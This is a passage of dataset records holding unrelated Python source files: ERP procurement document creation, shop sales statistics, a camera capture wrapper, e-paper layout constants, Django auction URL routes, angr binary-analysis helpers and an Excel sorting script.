href=\"+link+\">\"+doc.name+\"</a>\")\n\n\tif (self.items[0].payment_terms == \"LC @ Sight\"):\n\t\tdoc=frappe.new_doc(\"LC\")\n\t\tval=self.items\n\t\tdoc.supplier=self.supplier\n\t\tdoc.indent_no_c = self.indent_no_c\n\t\tdoc.company=self.company\n\t\tdoc.currency=self.currency\n\t\tdoc.price_list=self.buying_price_list\n\t\tdoc.schedule_date=self.schedule_date\n\t\tdoc.transaction_date=self.transaction_date\n\t\tfor row in val:\n\t\t\tdoc.append(\"items\",{'item_code':row.item_code,'item_name':row.item_name,'uom':row.uom,'description':row.description,'rate':row.rate,'amount':row.amount,'qty':row.qty,'stock_uom':row.stock_uom,'payment_terms':row.payment_terms})\n\t\tdoc.linked_indent=self.name\n\t\tdoc.total_quantity=self.total_qty\n\t\tdoc.total_in_words=self.in_words\n\t\tdoc.total_amount=self.total\n\t\tdoc.save()\n\t\tlink=\"/app/lc/\"+doc.name\n\t\tfrappe.msgprint(\"LC Created <a href=\"+link+\">\"+doc.name+\"</a>\")\n\n\tif (self.items[0].payment_terms == \"TT + DP\"):\n\t\tdoc=frappe.new_doc(\"TT DP\")\n\t\tval=self.items\n\t\tdoc.supplier=self.supplier\n\t\tdoc.company=self.company\n\t\tdoc.transaction_date=self.transaction_date\n\t\tdoc.schedule_date=self.schedule_date\n\t\tdoc.currency=self.currency\n\t\tdoc.price_list=self.buying_price_list\n\t\tfor row in val:\n\t\t\tdoc.append(\"items\",{'item_code':row.item_code,'item_name':row.item_name,'uom':row.uom,'description':row.description,'rate':row.rate,'amount':row.amount,'qty':row.qty,'stock_uom':row.stock_uom,'payment_terms':row.payment_terms,'hsnsac':row.gst_hsn_code})\n\t\tdoc.linked_indent=self.name\n\t\tdoc.total_quantity=self.total_qty\n\t\tdoc.total_in_words=self.in_words\n\t\tdoc.total_amount=self.total\n\t\tdoc.save()\n\t\tlink=\"/app/tt-dp/\"+doc.name\n\t\tfrappe.msgprint(\"TT DP Created <a 
href=\"+link+\">\"+doc.name+\"</a>\")\n\n\tif (self.items[0].payment_terms == \"LC Usance\"):\n\t\tdoc=frappe.new_doc(\"LC Usance\")\n\t\tval=self.items\n\t\tdoc.supplier=self.supplier\n\t\tdoc.company=self.company\n\t\tdoc.transaction_date=self.transaction_date\n\t\tdoc.schedule_date=self.schedule_date\n\t\tdoc.currency=self.currency\n\t\tdoc.price_list=self.buying_price_list\n\t\tfor row in val:\n\t\t\tdoc.append(\"items\",{'item_code':row.item_code,'item_name':row.item_name,'uom':row.uom,'description':row.description,'rate':row.rate,'amount':row.amount,'qty':row.qty,'stock_uom':row.stock_uom,'payment_terms':row.payment_terms})\n\t\tdoc.linked_indent=self.name\n\t\tdoc.total_quantity=self.total_qty\n\t\tdoc.total_in_words=self.in_words\n\t\tdoc.total_amount=self.total\n\t\tdoc.save()\n\t\tlink=\"/app/lc-usance/\"+doc.name\n\t\tfrappe.msgprint(\"LC Usance Created <a href=\"+link+\">\"+doc.name+\"</a>\")\n\n\n","repo_name":"gokulsng/imports","sub_path":"imports/imports/doctype/deal_finalize/deal_finalize.py","file_name":"deal_finalize.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40775526111","text":"import datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom Database.PathDatabase import PathDatabase\nfrom MVC.model.Attività.Account import Account\nfrom MVC.model.Interfacce.sistemServiceInterface.StatisticheInterface import StatisticheInterface\nfrom MVC.model.Servizio.Categoria import Categoria\nfrom MVC.model.Servizio.Prodotto import Prodotto\nfrom MVC.model.SistemService.File import File\n\n\nclass Statistiche(StatisticheInterface):\n\n # Costruttore della classe\n def __init__(self):\n pass\n\n # Metodo per la definizione di un oggetto Statistiche\n def aggiungiStatistiche(self):\n self.rimuoviStatsConData()\n listProdotti = self.getListProdottiVenduti()\n if listProdotti == None: listProdotti= list()\n listProdottiInData = self.getProdottiVendutiInData()\n if listProdottiInData == None: listProdottiInData = list()\n self.data = datetime.datetime.today()\n self.numeroClientiProprietari = self.getNumeroClienti()\n self.prodottiVendutiTotali = len(listProdotti)\n self.prodottiVendutiInData = len(listProdottiInData)\n self.nomePrimaCategoriaTendenza = \"\"\n self.nomeSecondaCategoriaTendenza = \"\"\n self.nomeTerzaCategoriaTendenza = \"\"\n self.numeroPrimaCategoriaTendenza = 0\n self.numeroSecondaCategoriaTendenza = 0\n self.numeroTerzaCategoriaTendenza = 0\n self.guadagnoTotale = self.calcolaGuadagno(self.getListProdottiVenduti())\n self.guadagnoInData = self.calcolaGuadagno(self.getProdottiVendutiInData())\n self.tendenzaCategorie = self.tendenzaCategorie()\n self.salvataggioStatitiche()\n\n # Metodo che appende la satistica creata e salva tutte le statistiche nel database\n def salvataggioStatitiche(self):\n fileName = PathDatabase().statisticheTxt\n file = File()\n listStatistiche = file.deserializza(fileName)\n listStatistiche.append(self)\n file.serializza(fileName, listStatistiche)\n\n # Metodo che cerca tra le statistiche dsponibili e trova la più recente, ritorna None se non ci sono statistiche\n def trovaUltimeStatistiche(self):\n fileName = PathDatabase().statisticheTxt\n file = File()\n listStatistiche = file.deserializza(fileName)\n if len(listStatistiche) == 0: return None\n statistica = None\n ultimaData = listStatistiche[0].data\n for stats in listStatistiche:\n if stats.data >= ultimaData:\n statistica = stats\n return statistica\n\n # Metodo per 
vedere quanti clienti proprietari sono registrati\n def getNumeroClienti(self):\n listClienti = Account().recuperaListaOggetti()\n numeroClienti = len(listClienti)\n return numeroClienti\n\n # Metodo che prende la lista dei prodotti venduti\n def getListProdottiVenduti(self):\n listVenduti = Prodotto().recuperaListaProdottiVenduti()\n return listVenduti\n\n # Metodo che calcola l'ammontare complessivo dei prodotti passati tramite listProdotti\n # listProdotti = lista dei prodotti\n def calcolaGuadagno(self, listProdotti):\n totale = 0\n for prodotto in listProdotti:\n totale += int(prodotto.prezzoCorrente)\n return totale\n\n # Metodo che prende la lista dei prodotti venduti nelle 24 ore anticedenti\n def getProdottiVendutiInData(self):\n listVenduti = self.getListProdottiVenduti()\n dataFiltro = datetime.datetime.today() - relativedelta(days=1)\n lista = list()\n for prodotto in listVenduti:\n if prodotto.dataEsposizione >= dataFiltro:\n lista.append(prodotto)\n return lista\n\n # Metodo che prende le categorie con tendenza maggiore e le restituisce come un dizionario\n # listProdotti = lista di prodotti da cui calcolare la repitizione delle loro categorie(tendenza)\n def tendenzaCategorie(self):\n listCategorie = Categoria().recuperaListaOggetti()\n for obj in listCategorie:\n if obj.oggettiTotali > self.numeroTerzaCategoriaTendenza \\\n and obj.oggettiTotali > self.numeroSecondaCategoriaTendenza \\\n and obj.oggettiTotali > self.numeroPrimaCategoriaTendenza:\n self.numeroPrimaCategoriaTendenza = obj.oggettiTotali\n self.nomePrimaCategoriaTendenza = obj.nome\n elif obj.oggettiTotali > self.numeroTerzaCategoriaTendenza \\\n and obj.oggettiTotali > self.numeroSecondaCategoriaTendenza \\\n and obj.oggettiTotali < self.numeroPrimaCategoriaTendenza:\n self.numeroSecondaCategoriaTendenza = obj.oggettiTotali\n self.nomeSecondaCategoriaTendenza = obj.nome\n elif obj.oggettiTotali > self.numeroTerzaCategoriaTendenza \\\n and obj.oggettiTotali < self.numeroSecondaCategoriaTendenza \\\n and obj.oggettiTotali < self.numeroPrimaCategoriaTendenza:\n self.numeroTerzaCategoriaTendenza = obj.oggettiTotali\n self.nomeTerzaCategoriaTendenza = obj.nome\n return listCategorie\n\n # Metodo che passata una lista di categorie trova la lista con piu oggetti\n def maxOggettiCategoria(self, lista):\n massimo = 0\n for ogg in lista:\n if ogg.oggettiTotali > massimo:\n massimo = ogg.oggettiTotali\n return massimo\n\n # Metodo che prende il numeroDiChiavi con valore piu alto\n # return dizionario con le categorie di tendenenza\n def topKeysInDict(self, dict):\n lista = list()\n for obj in sorted(dict, key=dict.get, reverse=False):\n lista.append(obj)\n return lista\n\n # Metodo che viene richiamato dall'Amministratore per la visualizzazione delle statistiche.\n # Esegue una lettura nel database di tutte le statistiche presenti e le restituisce come lista,\n # la lista verra' trasmessa alla WIEW per la visualizzazione grafica\n def visualizzaStatistiche(self):\n fileName = PathDatabase().statisticheTxt\n file = File()\n listStatistiche = file.deserializza(fileName)\n return listStatistiche\n\n # Metodo che rimuove le statistiche con la stessa data nello stesso giorno per non creare inconsistenza\n def rimuoviStatsConData(self):\n todayDate = datetime.datetime.today().date()\n lista = self.visualizzaStatistiche()\n if len(lista) == 0 or lista == None: return\n for stats in lista:\n statsDate = stats.data.date()\n if statsDate == todayDate:\n lista.pop(lista.index(stats))\n 
File().serializza(PathDatabase().statisticheTxt, lista)\n","repo_name":"LeonUrsu/NegozioDellUsato-ExamIS","sub_path":"UsatoBeatoFiles/UsatoBeatoPython/MVC/model/SistemService/Statistiche.py","file_name":"Statistiche.py","file_ext":"py","file_size_in_byte":6648,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43126510798","text":"# https://swexpertacademy.com/main/learn/course/subjectDetail.do?courseId=AVuPDN86AAXw5UW6&subjectId=AWOVFCzaqeUDFAWg\n\nimport sys\nsys.stdin = open (\"/Users/yuyeong/Desktop/1일 1코딩/2022.08.26/sw_전기버스.txt\")\n\nt = int(input())\nfor tc in range(1, t+1):\n k, n, m = map(int, input().split())\n num_b = list(map(int, input().split()))\n\n loc = 0 # 현재 위치\n char = 0 # 충전 횟수\n\n # 현재 위치 + 충전 후 이동할 수 있는 정류장 수 \n while loc + k < n:\n # 최대 기동 가능한 거리내에 충전소가 있는지 확인\n for i in range(k, 0, -1):\n if(loc + i) in num_b:\n # 충전소가 있을 경우 현재 위치에 더해 줌 \n loc += i\n # 충전 횟수 증가\n char += 1\n break\n # 최대 이동 거리 내에 충전소가 없는 경우 \n else:\n # 충전소 횟수 0\n char = 0\n break\n print('#{} {}'.format(tc, char))\n ","repo_name":"nevertheless0404/Study_slowly","sub_path":"2022.08.26/sw_전기버스.py","file_name":"sw_전기버스.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7316141349","text":"import atexit\nimport cv2\nimport numpy as np\nimport traitlets\nfrom pymba import Vimba, VimbaException, Frame\n\ndef bgr8_to_jpeg(value, quality=75):\n return bytes(cv2.imencode('.jpg', value)[1])\n\nclass AVTCamera(traitlets.HasTraits):\n # global vimba and vimba cameras group\n vimba = None\n cameras = None\n\n value = traitlets.Any()\n width = traitlets.Integer(default_value=224)\n height = traitlets.Integer(default_value=224)\n format = traitlets.Unicode(default_value='bgr8') # the format is fixed now\n running = traitlets.Bool(default_value=False)\n\n capture_fps = traitlets.Integer(default_value=10) # wait to support it later\n capture_width = traitlets.Integer(default_value=640)\n capture_height = traitlets.Integer(default_value=480) \n capture_device = traitlets.Integer(default_value=0)\n\n def __init__(self, *args, **kwargs):\n super(AVTCamera, self).__init__(*args, **kwargs)\n self.curCam = None\n self._running = False\n self.AcqMode = 'Unknown'\n if self.format == 'bgr8':\n self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)\n\n self.init_vimba()\n self.init_cam()\n self.getFrame()\n\n #atexit.register(self.release_vimba)\n atexit.register(self.release_cam)\n\n\n @traitlets.observe('running')\n def _on_streaming(self, change):\n # change is running status here\n if change['new'] and not change['old']:\n # transition from not running -> running\n self._running = True\n try:\n self.curCam.disarm()\n self.curCam.arm('Continuous', self.frame_callback)\n self.AcqMode = 'Continuous'\n self.curCam.start_frame_acquisition()\n except VimbaException as e:\n print(e)\n raise RuntimeError('Camera start Continuous running failure !!!')\n elif change['old'] and not change['new']:\n # transition from running -> not running\n self._running = False\n self.curCam.disarm()\n self.AcqMode = 'Unknown'\n\n\n def frame_callback(self, frame: Frame) -> None:\n type, image_8bit = self.convertFrame(frame)\n image = self.fillUserFrame(type, image_8bit)\n self.value = cv2.resize(image, (int(self.width), int(self.height)))\n #print(\"avt frame_callback\")\n\n\n def fillUserFrame(self, type, frame):\n PIXEL_FORMATS_RGB_CONVERSIONS = {\n 'BayerRG8': 
cv2.COLOR_BAYER_RG2RGB,\n }\n PIXEL_FORMATS_BGR_CONVERSIONS = {\n 'BayerRG8': cv2.COLOR_BAYER_RG2BGR,\n 'BayerGR8': cv2.COLOR_BAYER_GR2BGR,\n 'BayerRG12': cv2.COLOR_BAYER_RG2BGR,\n 'BayerRG12Packed': cv2.COLOR_BAYER_RG2BGR,\n 'BayerGR12Packed': cv2.COLOR_BAYER_GR2BGR,\n 'Mono8': cv2.COLOR_GRAY2BGR,\n 'Mono10': cv2.COLOR_GRAY2BGR,\n 'Mono12': cv2.COLOR_GRAY2BGR,\n 'Mono14': cv2.COLOR_GRAY2BGR,\n 'RGB8Packed': cv2.COLOR_RGB2BGR\n }\n\n if self.format == 'bgr8':\n if (type == \"BGR8Packed\"):\n img = frame\n else:\n img = cv2.cvtColor(frame, PIXEL_FORMATS_BGR_CONVERSIONS[type])\n return img\n\n def convertFrame(self, frame):\n camera_frame_size = len(frame.buffer_data())\n frame_pixel_format = frame.pixel_format\n Width = self.capture_width\n Height = self.capture_height\n #print(\"Resolution: %dx%d, FrameSize: %d, PixelFormat: %s\" %(Width, Height, camera_frame_size, frame_pixel_format))\n data_bytes = frame.buffer_data()\n if (frame_pixel_format == \"Mono8\" or frame_pixel_format == \"BayerRG8\" or frame_pixel_format == \"BayerGR8\"):\n frame_8bits = np.ndarray(buffer=data_bytes, dtype=np.uint8, shape=(Height, Width))\n elif (frame_pixel_format == \"BayerRG12\" or frame_pixel_format == \"Mono10\" or frame_pixel_format == \"Mono12\" or frame_pixel_format == \"Mono14\"):\n data_bytes = np.frombuffer(data_bytes, dtype=np.uint8)\n pixel_even = data_bytes[0::2]\n pixel_odd = data_bytes[1::2]\n # Convert bayer16 to bayer8 / Convert Mono12/Mono14 to Mono8\n if (frame_pixel_format == \"Mono14\"):\n pixel_even = np.right_shift(pixel_even, 6)\n pixel_odd = np.left_shift(pixel_odd, 2)\n elif (frame_pixel_format == \"Mono10\"):\n pixel_even = np.right_shift(pixel_even, 2)\n pixel_odd = np.left_shift(pixel_odd, 6)\n else:\n pixel_even = np.right_shift(pixel_even, 4)\n pixel_odd = np.left_shift(pixel_odd, 4)\n frame_8bits = np.bitwise_or(pixel_even, pixel_odd).reshape(Height, Width)\n elif (frame_pixel_format == \"BayerRG12Packed\" or frame_pixel_format == \"Mono12Packed\" or frame_pixel_format == \"BayerGR12Packed\"):\n data_bytes = np.frombuffer(data_bytes, dtype=np.uint8)\n size = len(data_bytes)\n index = []\n for i in range(0, size, 3):\n index.append(i + 1)\n data_bytes = np.delete(data_bytes, index)\n frame_8bits = data_bytes.reshape(Height, Width)\n elif (frame_pixel_format == \"RGB8Packed\" or frame_pixel_format == \"BGR8Packed\"):\n frame_8bits = np.ndarray(buffer=frame.buffer_data(), dtype=np.uint8, shape=(Height, Width * 3))\n else:\n # Note: wait to do -- other format, such as YUV411Packed, YUV422Packed, YUV444Packed\n frame_8bits = np.ndarray(buffer=frame.buffer_data(), dtype=np.uint8, shape=(Height, Width))\n raise RuntimeError('Unsupported image format, please re-configure the camera!!!')\n return frame_pixel_format, frame_8bits\n\n def _read(self):\n type, image_8bit = self.getFrame()\n image = self.fillUserFrame(type, image_8bit)\n image_resized = cv2.resize(image, (int(self.width), int(self.height)))\n return image_resized\n\n def read(self):\n if self._running:\n raise RuntimeError('Cannot read directly while camera is running')\n self.value = self._read()\n return self.value\n\n def getFrame(self):\n if self._running:\n raise RuntimeError('Cannot read directly while camera is running')\n else:\n try:\n if self.AcqMode != 'SingleFrame':\n self.curCam.arm('SingleFrame')\n self.AcqMode = 'SingleFrame'\n raw_frame = self.curCam.acquire_frame()\n type, frame = self.convertFrame(raw_frame)\n except VimbaException as e:\n print(e)\n raise RuntimeError(\"acquire_frame error\")\n return 
type, frame\n\n def _setROI(self):\n try:\n feature_h = self.curCam.feature(\"Height\")\n feature_h.value = self.capture_height\n feature_w = self.curCam.feature(\"Width\")\n feature_w.value = self.capture_width\n except:\n raise RuntimeError(\"Wrong capture_height/capture_width !!'acquire_frame'!\")\n\n def init_cam(self):\n vmFactory = AVTCamera.vimba.camera_ids()\n # Get connected cameras\n AVTCamera.cameras = [AVTCamera.vimba.camera(id) for id in vmFactory]\n cam_nums = len(AVTCamera.cameras);\n if cam_nums == 0:\n raise RuntimeError(\"Warning: No camera present.\")\n elif self.capture_device >= cam_nums:\n raise RuntimeError(\"Warning: No specified camera.\")\n else:\n self.curCam = AVTCamera.cameras[self.capture_device]\n try:\n self.curCam.open()\n self._setROI()\n self.curCam.arm('SingleFrame')\n self.AcqMode = 'SingleFrame'\n print(\"Device {} open OK\".format(self.capture_device))\n except VimbaException as e:\n print(e)\n raise RuntimeError(\"init_cam camera error\")\n\n\n def release_cam(self):\n if self.curCam:\n print(\"Release: Device {} ID: {}\".format(self.capture_device, self.curCam))\n self.curCam.disarm()\n self.curCam.close()\n\n def init_vimba(self):\n if AVTCamera.vimba == None:\n AVTCamera.vimba = Vimba()\n AVTCamera.vimba.startup()\n print (\"init_vimba\")\n\n def release_vimba(self):\n if AVTCamera.vimba:\n AVTCamera.vimba.shutdown()\n AVTCamera.vimba = None\n print (\"Exit: release_vimba\")","repo_name":"SunnyAVT/avtcam","sub_path":"avtcam/avt_camera.py","file_name":"avt_camera.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73486522612","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis file contains all the locations of the icons used.\nIt also contains the positions of these icons on the E-Paper display\n\"\"\"\n\nfrom PIL import Image\nim_open = Image.open\nimport os\n\npath = os.path.dirname(os.path.abspath(__file__)).replace(\"\\\\\", \"/\")\nif path != \"\" and path[-1] != \"/\":\n path += \"/\"\n\nwpath = path+'weather-icons/'\ndpath = path+'days/'\nopath = path+'other/'\nfpath = path+'fonts/'\n\nNotoSansCJK = 'NotoSansCJK/NotoSansCJKsc-'\nNotoSans = 'NotoSans/NotoSans-SemiCondensed'\nweather_font = 'WeatherFont/weathericons-regular-webfont.ttf'\n\nweekday = im_open(opath+'weekday.png')\neventicon = im_open(opath+'event.png')\ndateicon = im_open(opath+'today.png')\nseperator = im_open(opath+'seperator.jpeg')\nseperator2 = im_open(opath+'seperator2.jpeg')\nblack = im_open(opath+'black.jpeg')\nwhite = im_open(opath+'white.jpeg')\nred = im_open(opath+'red.jpeg')\n\nwiconplace = (0, 0)\ntempplace = (299, 0)\nhumplace = (299, 35)\nseperatorplace = (0, 72)\nmonthplace = (0, 74)\nweekplace = (3, 134)\nwindiconspace = (79, 0)\nsunriseplace = (214, 0)\nsunsetplace = (214, 35)\n\n\ncol = 0\nagenda_view_lines = {\n 'line1': (col, 75), 'line2': (col, 100),\n 'line3': (col, 125), 'line4': (col, 150),\n 'line5': (col, 175), 'line6': (col, 200),\n 'line7': (col, 225), 'line8': (col, 250),\n 'line9': (col, 275), 'line10': (col, 300),\n 'line11': (col, 325), 'line12': (col, 350),\n 'line13': (col, 375), 'line14': (col, 400),\n 'line15': (col, 425), 'line16': (col, 450),\n 'line17': (col, 475), 'line18': (col, 500),\n 'line19': (col, 525), 'line20': (col, 550),\n 'line21': (col, 575), 'line22': (col, 600),\n }\n\nrss_places = {\n 'line_1' : (0, 490), 'line_2' : (0, 515), 'line_3' : (0, 540),\n 'line_4' : (0, 565), 'line_5' : (0, 590), 'line_6' : (0, 
615)\n }\n\ne_col = 70\ndate_col = 0\n\ne_row_1 = 490\ne_row_2 = 515\ne_row_3 = 540\ne_row_4 = 565\ne_row_5 = 590\ne_row_6 = 615\n\nevent_positions = {\n 'e1': (e_col, e_row_1), 'e2': (e_col, e_row_2), 'e3': (e_col, e_row_3),\n 'e4': (e_col, e_row_4), 'e5': (e_col, e_row_5), 'e6': (e_col, e_row_6)\n }\n\ndate_positions = {\n 'd1': (date_col, e_row_1), 'd2': (date_col, e_row_2),\n 'd3': (date_col, e_row_3), 'd4': (date_col, e_row_4),\n 'd5': (date_col, e_row_5), 'd6': (date_col, e_row_6)\n }\n\ncol1 = 3\ncol2 = 57\ncol3 = 111\ncol4 = 165\ncol5 = 219\ncol6 = 273\ncol7 = 327\n\nrow1 = 162\nrow2 = 225\nrow3 = 288\nrow4 = 351\nrow5 = 414\nrow6 = 477\n\npositions = {\n 'a1': (col1, row1), 'a2': (col2, row1), 'a3': (col3, row1), 'a4': (col4, row1),\n 'a5': (col5, row1), 'a6': (col6, row1), 'a7': (col7, row1),\n\n 'b1': (col1, row2), 'b2': (col2, row2), 'b3': (col3, row2), 'b4': (col4, row2),\n 'b5': (col5, row2), 'b6': (col6, row2), 'b7': (col7, row2),\n\n 'c1': (col1, row3), 'c2': (col2, row3), 'c3': (col3, row3), 'c4': (col4, row3),\n 'c5': (col5, row3), 'c6': (col6, row3), 'c7': (col7, row3),\n\n 'd1': (col1, row4), 'd2': (col2, row4), 'd3': (col3, row4), 'd4': (col4, row4),\n 'd5': (col5, row4), 'd6': (col6, row4), 'd7': (col7, row4),\n\n 'e1': (col1, row5), 'e2': (col2, row5), 'e3': (col3, row5), 'e4': (col4, row5),\n 'e5': (col5, row5), 'e6': (col6, row5), 'e7': (col7, row5),\n\n 'f1': (col1, row6), 'f2': (col2, row6), 'f3': (col3, row6), 'f4': (col4, row6),\n 'f5': (col5, row6), 'f6': (col6, row6), 'f7': (col7, row6)\n }\n\nweek_row = 134\n\nweekday_pos = {\n 'pos0': (col1, week_row), 'pos1': (col2, week_row), 'pos2': (col3, week_row),\n 'pos3': (col4, week_row), 'pos4': (col5, week_row), 'pos5': (col6, week_row),\n 'pos6': (col7, week_row)\n }\n\nweathericons = {\n '01d': '\\uf00d', '02d': '\\uf002', '03d': '\\uf013',\n '04d': '\\uf012', '09d': '\\uf01a', '10d': '\\uf019',\n '11d': '\\uf01e', '13d': '\\uf01b', '50d': '\\uf014',\n '01n': '\\uf02e', '02n': '\\uf013', '03n': '\\uf013',\n '04n': '\\uf013', '09n': '\\uf037', '10n': '\\uf036',\n '11n': '\\uf03b', '13n': '\\uf038', '50n': '\\uf023'\n }\n","repo_name":"lemariva/ePaperWidgets","sub_path":"display/image_data.py","file_name":"image_data.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"10308072329","text":"import openpyxl\r\nimport pandas as pd\r\nfrom collections import defaultdict\r\nd = defaultdict(list)\r\n\r\n\r\ntable = openpyxl.load_workbook(filename=\"FEREKS.xlsx\")\r\nsheet = table.active\r\ntable_row = sheet.max_row\r\n\r\nobj_table1 = pd.read_excel('FEREKS.xlsx', header=None, usecols='A,B')\r\ndfs = []\r\n\r\n\r\nfor i in range(0,table_row):\r\n sample = obj_table1[27 * i + 1: 27 * (i + 1)]\r\n dfs.append(sample)\r\nprint(dfs)\r\nret = pd.concat(dfs)\r\nret_list = ret.values.tolist()\r\nfor h, n in ret_list:\r\n d[h].append(n)\r\ndf = pd.DataFrame([d])\r\ndf.to_excel(\"1.xlsx\")\r\nprint(d)\r\n\r\n","repo_name":"Sallamander-Zerg/exel_sort","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71800750453","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('login', views.login_view, name='login'),\n path('logout', views.logout_view, name='logout'),\n path('register', views.register, name='register'),\n path('auction/create', views.auction_create, name='auction_create'),\n path('auction/active', views.active_auctions_view, name='active_auctions_view'),\n path('auction/active/<str:category_name>', views.active_auctions_view, name='active_auctions_view'),\n path('auction/watchlist', views.watchlist_view, name='watchlist_view'),\n path('auction/watchlist/<int:auction_id>/edit/<str:reverse_method>', views.watchlist_edit, name='watchlist_edit'),\n path('auction/<str:auction_id>', views.auction_details_view, name='auction_details_view'),\n path('auction/<str:auction_id>/bid', views.auction_bid, name='auction_bid'),\n path('auction/<str:auction_id>/close', views.auction_close, name='auction_close'),\n path('auction/<str:auction_id>/comment', views.auction_comment, name='auction_comment'),\n path('categories/<str:category_name>', views.category_details_view, name='category_details_view'),\n]\n","repo_name":"BobsProgrammingAcademy/ecommerce-auction-website","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"23639645074","text":"import angr\n\nfrom angr.analyses.reaching_definitions.dep_graph import DepGraph\nfrom angr.calling_conventions import SimStackArg, SimRegArg\nfrom angr.engines.light import SpOffset\nfrom angr.knowledge_plugins.key_definitions import LiveDefinitions\n\n\ndef get_arg_defs(arch, livedefs, arg_ix):\n cc = angr.DEFAULT_CC[arch.name](arch)\n arg_loc = cc.arg_locs(is_fp=[False] * (arg_ix + 1))[arg_ix]\n\n if isinstance(arg_loc, SimRegArg):\n reg_offset = arch.registers[arg_loc.reg_name][0]\n arg_defs = livedefs.register_definitions.get_objects_by_offset(reg_offset)\n elif isinstance(arg_loc, SimStackArg):\n arg_defs = livedefs.stack_definitions.get_objects_by_offset(livedefs.get_sp().offset + arg_loc.stack_offset)\n else:\n raise ValueError(\"\")\n\n return arg_defs\n\ndef search_functions(functions, q, match_case=True, exact_match=False):\n matches = []\n q_lower = q\n if not match_case:\n q_lower = q.lower()\n\n for func in functions.values():\n is_match = func.name == q_lower or func.demangled_name == q_lower\n if not exact_match and not is_match:\n is_match = (q in func.name or q in func.demangled_name) or \\\n not match_case and (q_lower in func.name.lower() or q_lower in func.demangled_name.lower())\n\n if is_match:\n matches.append(func)\n\n return matches\n\n\ndef rda_with_dep_graph(p, *args, **kwargs):\n return p.analyses.ReachingDefinitions(*args, dep_graph=DepGraph(), **kwargs)\n\n\ndef get_arg_reg_offset(p, arg_ix):\n cc = angr.DEFAULT_CC[p.arch.name]\n r = cc.ARG_REGS[arg_ix]\n return p.arch.registers[r][0]\n\n\ndef get_ordered_arg_reg_offsets(p):\n cc = angr.DEFAULT_CC[p.arch.name]\n return [p.arch.registers[r][0] for r in cc.ARG_REGS]\n\n\ndef get_function_call_sites_and_targets(p, f):\n functions = p.kb.functions\n\n call_sites = {}\n for cs in f.get_call_sites():\n ct_addr = f.get_call_target(cs)\n call_sites[cs] = functions.get_by_addr(ct_addr)\n\n return call_sites\n\n\ndef load_string_from_memory(p, addr, load_size=128):\n try:\n string_bytes = p.loader.memory.load(addr, load_size)\n except KeyError as e:\n return None\n\n if 0 in string_bytes:\n zix = string_bytes.find(0)\n if zix < 
2:\n string_bytes = string_bytes[:string_bytes.find(0, zix)]\n else:\n string_bytes = string_bytes[:zix]\n\n return string_bytes.decode('utf-8', errors='backslashreplace')\n\n\ndef find_call_in_callgraph(p, f, addr=None, name=None, max_depth=3):\n callsites = {}\n _find_call_in_callgraph(p, f, addr, name, max_depth, callsites)\n return callsites\n\n\ndef _find_call_in_callgraph(p, f, addr, name, max_depth, callsites):\n if max_depth <= 0:\n return\n\n current_callsites = get_function_call_sites_and_targets(p, f)\n for cs, ct in current_callsites.items():\n if (addr and ct.addr == addr) or (name and ct.demangled_name == name) or (addr is None and name is None):\n callsites[cs] = ct\n else:\n _find_call_in_callgraph(p, ct, addr, name, max_depth-1, callsites)\n\n# def dominates()\n\n","repo_name":"mounir-khaled/SAUSAGE","sub_path":"binary_socket_analyzer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"6490101527","text":"from datetime import datetime\nfrom .convertions import unpack_value_t, cmap_to_dict, ctimewithns_to_time\n\n\nclass NamespaceElement:\n def __init__(self, value, name, description):\n self.value = value\n self.name = name\n self.description = description\n\n @classmethod\n def unpack_from_ne_struct(cls, nm_element_struct):\n return cls(\n nm_element_struct.value.decode(encoding=\"utf-8\"),\n nm_element_struct.name.decode(encoding=\"utf-8\"),\n nm_element_struct.description.decode(encoding=\"utf-8\"),\n )\n\n def is_dynamic(self) -> bool:\n return bool(not self.name)\n\n\nclass Namespace:\n def __init__(self, namespace_elements, length, string):\n self.length = length\n self.namespace_elements = namespace_elements\n self.string = string\n\n @classmethod\n def unpack_from_nm_struct(cls, namespace_struct):\n _length = namespace_struct.length\n _str = namespace_struct.string.decode(encoding=\"utf-8\")\n elements = namespace_struct.elements\n _ne_arr = []\n for i in range(_length):\n _el = NamespaceElement.unpack_from_ne_struct(elements[i])\n _ne_arr.append(_el)\n return cls(_ne_arr, _length, _str)\n\n def __repr__(self):\n return self.string\n\n def __iter__(self):\n for element in self.namespace_elements:\n yield element\n\n def __len__(self) -> int:\n return len(self.namespace_elements)\n\n def __getitem__(self, index: int) -> NamespaceElement:\n return self.namespace_elements[index]\n\n\nclass Metric:\n def __init__(\n self,\n namespace=\"\",\n description=\"\",\n value=\"\",\n value_type=None,\n timestamp=\"\",\n tags=\"\",\n ):\n self.namespace = namespace\n self.description = description\n\n self.value = value\n self.unit = value_type\n self.timestamp = timestamp\n self.tags = tags\n\n def _tags_to_str(self) -> str:\n all_tags = \"\"\n if self.tags:\n for k, v in self.tags.items():\n _tags = \":\".join([str(k), str(v)])\n all_tags = \" \".join([all_tags, _tags])\n return all_tags\n\n def __repr__(self) -> str:\n _repr = \"{} {} {} {} {}\".format(\n self.namespace,\n self.unit,\n self.value,\n self.description,\n datetime.utcfromtimestamp(self.timestamp),\n )\n tags = 